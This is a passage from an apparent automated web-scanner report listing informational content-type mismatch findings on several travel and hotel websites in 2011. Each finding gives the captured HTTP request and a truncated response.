Severity:   Information
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /images_unique/cs/CS_FAQbanner_w.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images_unique/cs/CS_FAQbanner_w.jpg HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 5958
Content-Type: image/jpeg
Last-Modified: Thu, 10 Feb 2011 21:56:07 GMT
Accept-Ranges: bytes
ETag: "183c3f526dc9cb1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:11 GMT

GIF89as.|.....u....C..{..>..;..0..,..D..*..B..7..3..@..F..9..5..=../..J..    u..x.(...~..}..{.....y..z..w....%..
v..|.!.....$.........w..~....9..)..k.................Z.....2..4..6...w..x.0.....,.. z.*...
...[SNIP]...
25.27. http://www.cruises.com/images_unique/cs/CS_HeadlineBanner_w.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /images_unique/cs/CS_HeadlineBanner_w.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images_unique/cs/CS_HeadlineBanner_w.jpg HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 12111
Content-Type: image/jpeg
Last-Modified: Thu, 10 Feb 2011 21:56:07 GMT
Accept-Ranges: bytes
ETag: "789e41526dc9cb1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:10 GMT

GIF89a..x.........................d.............................X..q..t..a........g.............................c.............................Q........m...........|....................................
...[SNIP]...
25.28. http://www.cruisesonly.com/code/webdata/webdataregister.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruisesonly.com
Path:   /code/webdata/webdataregister.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /code/webdata/webdataregister.asp?webdataID=1910 HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 34
Content-Type: text/html
Cache-control: private
Content-Length: 34

function DummyBrowserCheck11() {};
25.29. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=09addd37a06e06e413d53e5411603783&extern=0&channel=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.140.33
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
25.30. http://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=669945&crd_cnt=0.01&crd_tpb=1317646533158&crd_olt=8359 HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_SITE=prod3; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_pers=%20s_lv%3D1317646536434%7C1412254536434%3B%20s_lv_s%3DFirst%2520Visit%7C1317648336434%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; fsr.a=1317646541286; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"}}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:55:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
25.31. https://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=508779&crd_cnt=0.01&crd_tpb=1317646588001&crd_olt=7782 HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_pers=%20s_lv%3D1317646590532%7C1412254590532%3B%20s_lv_s%3DFirst%2520Visit%7C1317648390532%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}; fsr.a=1317646594850

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:56:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
25.32. http://www.ncl.com/nclweb/common/query_all.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/common/query_all.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /nclweb/common/query_all.json HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*
Referer: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.5.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 03 Oct 2011 07:00:01 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 24098
Date: Mon, 03 Oct 2011 12:48:31 GMT
Connection: close

{"AggrRecords":[{"RecordCount":"2","RecordSpec":"18217_BESTFARE_0","AggRecDetailLink":"N=&Nr=AND%28p_Record_Type%3AI%2Cp_Fare_Code%3ABF%29&Nu=p_Itinerary_Code","DerivedProperties":{"p_Spa_Amt":"","p_I
...[SNIP]...
25.33. http://www.opentable.com/httphandlers/MetroData.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.opentable.com
Path:   /httphandlers/MetroData.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /httphandlers/MetroData.aspx?m=4&mc=US&v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 13631

var OTLOOKUP_METROS = new Hash({45:[45,'Alabama',[33.4886090,-86.7568810]],331:[331,'Amsterdam',[52.3765710,4.9071000]],212:[212,'Anchorage',[61.2175750,-149.8877980]],95:[95,'Arkansas',[35.2142097,-9
...[SNIP]...
25.34. http://www.orbitz.com/hotelimages/346/12346/Wellington-Hotel-Guest-Room-10.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /hotelimages/346/12346/Wellington-Hotel-Guest-Room-10.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain XML.

Request

GET /hotelimages/346/12346/Wellington-Hotel-Guest-Room-10.jpg HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://vacations.rooms.com/wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; _br_uid_1=uid%3D999836241826%3A; OrbitzRegistration="N,2,0,0"; MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMjU0MjE4fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzc6MzQgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; curr=USD; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6||MIA|10/04/11|||||||MIA|BOS||10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317599876265:ss=1317596806325; mbox=session#1317600406536-142286#1317605337|PC#1317600406536-142286.19#1320195477|check#true#1317603537; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 07 Sep 2011 01:32:36 GMT
ETag: "379d8-4ac4feb4c2071"
Cache-Control: max-age=31536000
Expires: Tue, 02 Oct 2012 12:45:05 GMT
Content-Type: image/jpeg
Content-Length: 227800
Server: Apache
Date: Mon, 03 Oct 2011 12:45:05 GMT
Age: 0
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>vfmleo</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>true</
...[SNIP]...
25.35. http://www1.hilton.com/brand/hi/media/images/buttons/button_pushtotalk.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /brand/hi/media/images/buttons/button_pushtotalk.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /brand/hi/media/images/buttons/button_pushtotalk.gif HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "a66-cf752a40"
Accept-Ranges: bytes
Content-Length: 2662
Content-Type: image/gif
Cache-Control: max-age=86344
Expires: Tue, 04 Oct 2011 13:16:01 GMT
Date: Mon, 03 Oct 2011 13:16:57 GMT
Connection: close

BMf
......6...(...V...............0...................i...N............vw..........?@.............|!"..\]...............................................................................................
...[SNIP]...
25.36. http://www1.hilton.com/common/media/images/misc/icon_arrow_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /common/media/images/misc/icon_arrow_gray.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /common/media/images/misc/icon_arrow_gray.gif HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "452-cf752a40"
Accept-Ranges: bytes
Content-Length: 1106
Content-Type: image/gif
Cache-Control: max-age=1832
Expires: Mon, 03 Oct 2011 13:47:29 GMT
Date: Mon, 03 Oct 2011 13:16:57 GMT
Connection: close

BMR.......6...(.........................................................................................................................................................................................
...[SNIP]...
25.37. http://www1.hilton.com/common/media/images/misc/photogallery_thumbnails_background.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /common/media/images/misc/photogallery_thumbnails_background.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /common/media/images/misc/photogallery_thumbnails_background.gif HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/photoGallery.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "297-cf752a40"
Accept-Ranges: bytes
Content-Length: 663
Content-Type: image/gif
Cache-Control: max-age=72662
Expires: Tue, 04 Oct 2011 09:04:48 GMT
Date: Mon, 03 Oct 2011 12:53:46 GMT
Connection: close

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...
25.38. http://www1.hilton.com/en_US/common/media/images/headers/header_talktousnow.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/common/media/images/headers/header_talktousnow.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /en_US/common/media/images/headers/header_talktousnow.gif HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:54 GMT
ETag: "f1a-cf846c80"
Accept-Ranges: bytes
Content-Length: 3866
Content-Type: image/gif
Cache-Control: max-age=19449
Expires: Mon, 03 Oct 2011 18:41:06 GMT
Date: Mon, 03 Oct 2011 13:16:57 GMT
Connection: close

BM........6...(....................
...................h.......r..^...............N....|..~...n...............>.........................................................................................
...[SNIP]...
25.39. http://www1.hilton.com/en_US/hi/media/images/buttons/button_sendform.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
